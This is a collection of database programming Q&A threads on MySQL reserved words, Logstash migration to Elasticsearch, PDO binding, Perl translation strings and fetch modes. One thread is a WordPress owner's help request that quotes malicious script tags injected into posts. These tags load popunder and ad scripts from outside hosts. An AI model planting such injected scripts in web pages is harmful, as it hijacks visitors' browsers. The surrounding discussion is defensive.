Check SQL schema for reserved words and find suitable replacement - mysql

I wasted many hours troubleshooting my DB, which included maxValue as a column name. I've since discovered it is a reserved word.
I've used type and timestamp with both MySQL and MariaDB without issues, but I've learned my lesson and will never do so again (MySQL lists both as reserved, yet MariaDB only lists timestamp and even says it's still okay to use).
Is there some sort of online tool which will check a schema, using the SQL dump or the CREATE statements, for reserved words?
Is there any resource or strategy showing typical replacement words? I suppose I could make them plural, but doing so goes against my personal standard.

For what it is worth, here is a tool...
Note that mysql.help_keyword is not supported with MariaDB 10.2.7, so I had to hardcode the reserved words.
<?php
error_reporting(E_ALL);
ini_set('display_startup_errors', 1);
ini_set('display_errors', 1);
openlog('API', LOG_NDELAY, LOG_LOCAL2);
if ($_SERVER['REQUEST_METHOD'] == 'POST' && !empty($_POST['database'])) {
    $db = parse_ini_file(__DIR__.'/../config.ini', true)['mysql'];
    $pdo = new PDO(
        "mysql:host={$db['host']};dbname={$db['dbname']};charset={$db['charset']}",
        $db['username'],
        $db['password'],
        array(
            PDO::ATTR_EMULATE_PREPARES => false,
            PDO::MYSQL_ATTR_USE_BUFFERED_QUERY => true,
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_OBJ
        )
    );
    $error = ['tableHelper'=>[], 'columnHelper'=>[], 'tableMdbReserved'=>[], 'columnMdbReserved'=>[], 'tableMdbException'=>[], 'columnMdbException'=>[]];
    $stmt = $pdo->query('SELECT name FROM mysql.help_keyword');
    $reserved = $stmt->fetchAll(PDO::FETCH_COLUMN);
$mdbReserved=['ACCESSIBLE','ADD','ALL','ALTER','ANALYZE','AND','AS','ASC','ASENSITIVE','BEFORE','BETWEEN','BIGINT','BINARY','BLOB','BOTH','BY','CALL','CASCADE','CASE','CHANGE','CHAR','CHARACTER','CHECK','COLLATE','COLUMN','CONDITION','CONSTRAINT','CONTINUE','CONVERT','CREATE','CROSS','CURRENT_DATE','CURRENT_TIME','CURRENT_TIMESTAMP','CURRENT_USER','CURSOR','DATABASE','DATABASES','DAY_HOUR','DAY_MICROSECOND','DAY_MINUTE','DAY_SECOND','DEC','DECIMAL','DECLARE','DEFAULT','DELAYED','DELETE','DESC','DESCRIBE','DETERMINISTIC','DISTINCT','DISTINCTROW','DIV','DOUBLE','DROP','DUAL','EACH','ELSE','ELSEIF','ENCLOSED','ESCAPED','EXISTS','EXIT','EXPLAIN','FALSE','FETCH','FLOAT','FLOAT4','FLOAT8','FOR','FORCE','FOREIGN','FROM','FULLTEXT','GENERAL','GRANT','GROUP','HAVING','HIGH_PRIORITY','HOUR_MICROSECOND','HOUR_MINUTE','HOUR_SECOND','IF','IGNORE','IGNORE_SERVER_IDS','IN','INDEX','INFILE','INNER','INOUT','INSENSITIVE','INSERT','INT','INT1','INT2','INT3','INT4','INT8','INTEGER','INTERVAL','INTO','IS','ITERATE','JOIN','KEY','KEYS','KILL','LEADING','LEAVE','LEFT','LIKE','LIMIT','LINEAR','LINES','LOAD','LOCALTIME','LOCALTIMESTAMP','LOCK','LONG','LONGBLOB','LONGTEXT','LOOP','LOW_PRIORITY','MASTER_HEARTBEAT_PERIOD','MASTER_SSL_VERIFY_SERVER_CERT','MATCH','MAXVALUE','MEDIUMBLOB','MEDIUMINT','MEDIUMTEXT','MIDDLEINT','MINUTE_MICROSECOND','MINUTE_SECOND','MOD','MODIFIES','NATURAL','NOT','NO_WRITE_TO_BINLOG','NULL','NUMERIC','ON','OPTIMIZE','OPTION','OPTIONALLY','OR','ORDER','OUT','OUTER','OUTFILE','PARTITION','PRECISION','PRIMARY','PROCEDURE','PURGE','RANGE','READ','READS','READ_WRITE','REAL','RECURSIVE','REFERENCES','REGEXP','RELEASE','RENAME','REPEAT','REPLACE','REQUIRE','RESIGNAL','RESTRICT','RETURN','REVOKE','RIGHT','RLIKE','ROWS','SCHEMA','SCHEMAS','SECOND_MICROSECOND','SELECT','SENSITIVE','SEPARATOR','SET','SHOW','SIGNAL','SLOW','SMALLINT','SPATIAL','SPECIFIC','SQL','SQLEXCEPTION','SQLSTATE','SQLWARNING','SQL_BIG_RESULT','SQL_CALC_FOUND_ROWS','SQL_SMALL_RESULT','SSL','STARTING','STRAIGHT_JOIN','TABLE','TERMINATED','THEN','TINYBLOB','TINYINT','TINYTEXT','TO','TRAILING','TRIGGER','TRUE','UNDO','UNION','UNIQUE','UNLOCK','UNSIGNED','UPDATE','USAGE','USE','USING','UTC_DATE','UTC_TIME','UTC_TIMESTAMP','VALUES','VARBINARY','VARCHAR','VARCHARACTER','VARYING','WHEN','WHERE','WHILE','WITH','WRITE','XOR','YEAR_MONTH','ZEROFILL'];
    $mdbExceptions = ['ACTION','BIT','DATE','ENUM','NO','TEXT','TIME','TIMESTAMP'];
    $stmt = $pdo->prepare('SELECT UPPER(TABLE_NAME) tn, UPPER(COLUMN_NAME) cn FROM information_schema.columns WHERE table_schema = ?');
    $stmt->execute([$_POST['database']]);
    while($rs = $stmt->fetch()) {
        if(in_array($rs->tn, $reserved)) {
            $error['tableHelper'][] = $rs->tn;
        }
        if(in_array($rs->cn, $reserved) && !in_array($rs->cn, $error['columnHelper'])) {
            $error['columnHelper'][] = $rs->cn;
        }
        if(in_array($rs->tn, $mdbReserved)) {
            $error['tableMdbReserved'][] = $rs->tn;
        }
        if(in_array($rs->cn, $mdbReserved) && !in_array($rs->cn, $error['columnMdbReserved'])) {
            $error['columnMdbReserved'][] = $rs->cn;
        }
        if(in_array($rs->tn, $mdbExceptions)) {
            $error['tableMdbException'][] = $rs->tn;
        }
        if(in_array($rs->cn, $mdbExceptions) && !in_array($rs->cn, $error['columnMdbException'])) {
            $error['columnMdbException'][] = $rs->cn;
        }
    }
    echo('<pre>'.print_r($error, 1).'</pre>');
}
else {
    echo <<<EOT
<form method="post">
Database Name: <input type="text" name="database"><br>
<input type="submit">
</form>
EOT;
}
Output:
Array
(
[tableHelper] => Array
(
)
[columnHelper] => Array
(
[0] => TYPE
[1] => NAME
[2] => TIMESTAMP
[3] => OFFSET
[4] => VALUE
[5] => STATUS
[6] => PORT
)
[tableMdbReserved] => Array
(
)
[columnMdbReserved] => Array
(
[0] => MAXVALUE
)
[tableMdbException] => Array
(
)
[columnMdbException] => Array
(
[0] => TIMESTAMP
)
)
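In the meantime, a reserved word can still be used if the identifier is always quoted with backticks. This is not the renaming strategy asked about, just the stock workaround; the connection details and table name below are made up for illustration:
<?php
// Workaround sketch: backtick-quote reserved identifiers until they can be renamed.
// Connection details and the table name are placeholders.
$pdo  = new PDO('mysql:host=localhost;dbname=test;charset=utf8mb4', 'user', 'pass');
$stmt = $pdo->prepare('SELECT `maxValue`, `timestamp` FROM `sequence_settings` WHERE id = ?');
$stmt->execute([1]);
print_r($stmt->fetch(PDO::FETCH_ASSOC));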

Related

How to migrate Mysql data to elasticsearch using logstash

I need a brief explanation of how I can convert MySQL data to Elasticsearch using Logstash.
Can anyone explain the step-by-step process?
This is a broad question; I don't know how familiar you are with MySQL and ES. Let's say you have a table user. You may simply dump it as CSV and load it into ES and that will be good, but if you have dynamic data, with MySQL acting like a pipeline, you need to write a script to handle it. Anyway, you can check the links below to build your basic knowledge before you ask how.
How to dump mysql?
How to load data to ES
Also, you probably want to know how to convert your CSV to a JSON file, which is the format best suited for ES to understand (a short sketch follows the link below).
How to convert CSV to JSON
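For the CSV-to-JSON step, here is a minimal PHP sketch; the file names data.csv and data.ndjson are assumptions, and the first CSV row is assumed to hold the column names. It produces newline-delimited JSON, which is easy to feed to ES:
<?php
// Convert data.csv (header row = column names) to newline-delimited JSON.
$in  = fopen('data.csv', 'r');
$out = fopen('data.ndjson', 'w');
$header = fgetcsv($in);
while (($row = fgetcsv($in)) !== false) {
    fwrite($out, json_encode(array_combine($header, $row)) . "\n");
}
fclose($in);
fclose($out);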
You can do it using the jdbc input plugin for logstash.
Here is a config example.
Let me provide you with a high level instruction set.
Install Logstash and Elasticsearch.
Copy ojdbc7.jar into the Logstash bin folder.
For Logstash, create a config file, e.g. config.yml
#
input {
    # Get the data from the database; configure fields to get data incrementally
    jdbc {
        jdbc_driver_library => "./ojdbc7.jar"
        jdbc_driver_class => "Java::oracle.jdbc.driver.OracleDriver"
        jdbc_connection_string => "jdbc:oracle:thin:@db:1521:instance"
        jdbc_user => "user"
        jdbc_password => "pwd"
        id => "some_id"
        jdbc_validate_connection => true
        jdbc_validation_timeout => 1800
        connection_retry_attempts => 10
        connection_retry_attempts_wait_time => 10
        # fetch the db logs using logid
        statement => "select * from customer.table where logid > :sql_last_value order by logid asc"
        # limit how many results are pre-fetched at a time from the cursor into the client's cache before retrieving more results from the result-set
        jdbc_fetch_size => 500
        jdbc_default_timezone => "America/New_York"
        use_column_value => true
        tracking_column => "logid"
        tracking_column_type => "numeric"
        record_last_run => true
        schedule => "*/2 * * * *"
        type => "log.customer.table"
        add_field => {"source" => "customer.table"}
        add_field => {"tags" => "customer.table" }
        add_field => {"logLevel" => "ERROR" }
        last_run_metadata_path => "last_run_metadata_path_table.txt"
    }
}
# Massage the data to store in the index
filter {
    if [type] == 'log.customer.table' {
        # assign values from db columns to custom fields of the index
        ruby {
            code => "event.set( 'errorid', event.get('ssoerrorid') );
                     event.set( 'msg', event.get('errormessage') );
                     event.set( 'logTimeStamp', event.get('date_created'));
                     event.set( '@timestamp', event.get('date_created'));
                    "
        }
        # remove the db columns that were mapped to custom fields of the index
        mutate {
            remove_field => ["ssoerrorid","errormessage","date_created" ]
        }
    } # end of [type] == 'log.customer.table'
} # end of filter
# Insert into the index
output {
    if [type] == 'log.customer.table' {
        amazon_es {
            hosts => ["vpc-xxx-es-yyyyyyyyyyyy.us-east-1.es.amazonaws.com"]
            region => "us-east-1"
            aws_access_key_id => '<access key>'
            aws_secret_access_key => '<secret password>'
            index => "production-logs-table-%{+YYYY.MM.dd}"
        }
    }
}
Go to bin and run:
logstash -f config.yml

Backdoor code injection in wordpress database - how to remove - better still how to fix?

Every day or so, backdoor code gets added (injected?) to the end of all the rows in wp_posts - post_content.
Wordfence picks up only the entry cutwin and alerts me - it doesn't clean it. I've also tried other WP anti-malware plugins to no effect. All I know how to do at present is neuter it by using WP search & replace on 'cutwin', replacing it with 'example', then painstakingly deleting the code row by row. With 113 entries in the table, this is slow. My questions are:
1) Can someone give me SQL code that I can put in phpMyAdmin to quickly delete it from all rows in wp_posts - post_content? A script that found the first line (see below) and removed that and everything after it would do the trick, but I don't know how to code it myself.
2) Does anyone know what's causing this and how to get rid of it?
Theme: Generatepress
Plugins in use:
Akismet Anti Spam,
Anti-Malware Security and Brute-Force Firewall,
Better Search Replace,
Elementor,
Elementor Pro,
GP Premium,
Superfly Menu,
UpdraftPlus - Backup/Restore,
Use Any Font,
Wordfence Security,
WP Crontrol,
WP Rocket,
WP Smush,
WP-Sweep
The malicious code follows.
Many thanks,
Michael
<script type="text/javascript">
var adlinkfly_url = 'https://cutwin.com/';
var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
var adlinkfly_advert = 2;
var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
</script>
<script src='//cutwin.com/js/full-page-script.js'></script>
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
Since the cutwin script is being injected periodically, the first thing I would suspect is that the malware is using a cron job to do the injection. The cron jobs are stored in the wp_options table with option_name 'cron'. Unfortunately, this is a serialized value and is very hard to read directly. However, you can create a simple PHP script to unserialize it.
<?php
require('wp-load.php');
var_dump( get_option( 'cron' ) );
?>
I would save this in the root directory (where wp-load.php is found) and run it from your browser. The output looks like this:
Array
(
[1522826738] => Array
(
[delete_expired_transients] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
[1522826996] => Array
(
[wp_update_plugins] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
[wp_update_themes] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
[wp_version_check] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => twicedaily
[args] => Array
(
)
[interval] => 43200
)
)
)
[1522827110] => Array
(
[wp_scheduled_delete] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
[1522828797] => Array
(
[wp_scheduled_auto_draft_delete] => Array
(
[40cd750bba9870f18aada2478b24840a] => Array
(
[schedule] => daily
[args] => Array
(
)
[interval] => 86400
)
)
)
where 'delete_expired_transients', 'wp_update_plugins', 'wp_update_themes', ... are the names of PHP functions to run periodically. Check that all of these functions are reasonable. A skilled malware author would use something better hidden, but you should still check that there are no strange cron jobs.
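If a hook you don't recognize does turn up, a short follow-up script can remove it; 'suspicious_hook_name' below is just a placeholder for whatever rogue entry you find in the dump above:
<?php
require('wp-load.php');
// Replace 'suspicious_hook_name' with the rogue entry found in the cron dump.
wp_clear_scheduled_hook( 'suspicious_hook_name' );
var_dump( wp_next_scheduled( 'suspicious_hook_name' ) ); // false once the job is gone
?>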

Tried to bind parameter number 0. SQL Server supports a maximum of 2100 parameters

I'm currently using a PDO class that works perfectly on MySQL, but when it comes to MSSQL, I get an error when I try to insert data via the bindValue() function.
I'm using this method for data binding:
bindValue(":param",$value)
Step 1 - Create an array for the table fields in the query
$counter = 0;
foreach($fields as $cols)
{
    $fieldBind[$counter] = ":".$cols;
    $new_f = $new_f . $cols;
    $counter++;
    if($counter != count($fields))
    {
        $new_f = $new_f . ",";
    }
}
Output: ( [0] => :field1 [1] => :field2 [2] => :field3 )
Step 2 - Create an array for the data of the fields in the query
$counter2 = 0;
foreach($data as $cols)
{
    $dataBind[$counter2] = $cols;
    $new_d = $new_d . "'" . $cols . "'";
    $counter2++;
    if($counter2 != count($data))
    {
        $new_d = $new_d . ",";
    }
}
Output: ( [0] => value1 [1] => value2 [2] => value3 )
Step 3 - Prepare the query via the query function
parent::query("INSERT INTO $table($new_f) VALUES($new_d)");
Step 4 - Bind the Parameters and Values
for($i = 0; $i < count($data); $i++) {
    parent::bind($fieldBind[$i], $dataBind[$i]);
}
The query looks like this:
INSERT INTO table(field1,field2,field3) values(':value1',':value2',':value3')
Step 5 - Execute the Query
try {
    parent::execute();
    return parent::rowCount();
}
catch(PDOException $e) {
    echo $e->getMessage();
}
This method works perfectly on MySQL, but when I try to execute this on SQL Server, I get this error:
SQLSTATE[IMSSP]: Tried to bind parameter number 0. SQL Server supports a maximum of 2100 parameters.
Try removing the apostrophes (single quotes) around the placeholders, changing:
INSERT INTO table(field1,field2,field3) values(':value1',':value2',':value3')
to:
INSERT INTO table(field1,field2,field3) values(:value1,:value2,:value3)
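For reference, a minimal self-contained sketch of the same insert with unquoted named placeholders; the DSN, table and column names here are made up:
<?php
// Hypothetical SQL Server connection, for illustration only.
$pdo = new PDO('sqlsrv:Server=localhost;Database=testdb', 'user', 'pass');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$stmt = $pdo->prepare('INSERT INTO table1(field1, field2, field3) VALUES(:field1, :field2, :field3)');
$stmt->bindValue(':field1', 'value1');
$stmt->bindValue(':field2', 'value2');
$stmt->bindValue(':field3', 'value3');
$stmt->execute();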

Replace variables extracted from database with their values

I'd like to translate a Perl web site into several languages. I searched for and tried many ideas, but I think the best one is to save all translations inside the MySQL database. But I ran into a problem...
When a sentence extracted from the database contains a variable (scalar), it prints on the web page as a literal scalar:
You have $number new messages.
Is there a proper way to reassign $number its actual value?
Thank you for your help!
You can use printf format strings in your database and pass values in to them.
printf allows you to specify the position of each argument, so you only need to know where "$number" falls in the list of parameters.
For example
#!/usr/bin/perl
use strict;
my $Details = {
    'Name' => 'Mr Satch',
    'Age' => '31',
    'LocationEn' => 'England',
    'LocationFr' => 'Angleterre',
    'NewMessages' => 20,
    'OldMessages' => 120,
};
my $English = q(
Hello %1$s, I see you are %2$s years old and from %3$s
How are you today?
You have %5$i new messages and %6$i old messages
Have a nice day
);
my $French = q{
Bonjour %1$s, je vous vois d'%4$s et âgés de %2$s ans.
Comment allez-vous aujourd'hui?
Vous avez %5$i nouveaux messages et %6$i anciens messages.
Bonne journée.
};
printf($English, @$Details{qw/Name Age LocationEn LocationFr NewMessages OldMessages/});
printf($French, @$Details{qw/Name Age LocationEn LocationFr NewMessages OldMessages/});
This would be a nightmare to maintain, so an alternative might be to include an argument list in the database:
#!/usr/bin/perl
use strict;
sub fetch_row {
    return {
        'Format' => 'You have %i new messages and %i old messages' . "\n",
        'Arguments' => 'NewMessages OldMessages',
    }
}
sub PrintMessage {
    my ($info, $row) = @_;
    printf($row->{'Format'}, @$info{split(/ +/, $row->{'Arguments'})});
}
my $Details = {
    'Name' => 'Mr Satch',
    'Age' => '31',
    'LocationEn' => 'England',
    'LocationFr' => 'Angleterre',
    'NewMessages' => 20,
    'OldMessages' => 120,
};
my $row = fetch_row();
PrintMessage($Details, $row);

return only column name values from mysql table

Sorry, but I didn't know how to explain the question in one sentence...
Actually, I get an array like this when I do mysql_fetch_array...
[0] => 10
[id] => 10
[1] => 58393
[iid] => 58393
[2] => 0
[ilocationid] => 0
[3] => 38389
[iapptid] => 38389
[4] => 2012-06-30T00:00:00
[ddate] => 2012-06-30T00:00:00
[5] => 1000
[ctimeofday] => 1000
but I want to return something like this:
[id] => 10
[iid] => 58393
[ilocationid] => 0
[iapptid] => 38389
[ddate] => 2012-06-30T00:00:00
[ctimeofday] => 1000
I mean without the numeric indices of the columns. How do I do it? Please help...
As explained in the manual for PHP's mysql_fetch_array() function:
The type of returned array depends on how result_type is defined. By using MYSQL_BOTH (default), you'll get an array with both associative and number indices. Using MYSQL_ASSOC, you only get associative indices (as mysql_fetch_assoc() works), using MYSQL_NUM, you only get number indices (as mysql_fetch_row() works).
Therefore, you want either:
mysql_fetch_array($result, MYSQL_ASSOC);
or
mysql_fetch_assoc($result);
Note however the warning:
Use of this extension is discouraged. Instead, the MySQLi or PDO_MySQL extension should be used. See also MySQL: choosing an API guide and related FAQ for more information. Alternatives to this function include:
mysqli_fetch_array()
PDOStatement::fetch()
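For example, the PDO equivalent of an associative-only fetch looks like this; the connection details and table name are placeholders:
<?php
// Hypothetical credentials and table, for illustration only.
$pdo = new PDO('mysql:host=localhost;dbname=test;charset=utf8mb4', 'user', 'pass');
$stmt = $pdo->query('SELECT id, iid, ilocationid, iapptid, ddate, ctimeofday FROM appointments');
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
    print_r($row); // only column-name keys, no numeric indices
}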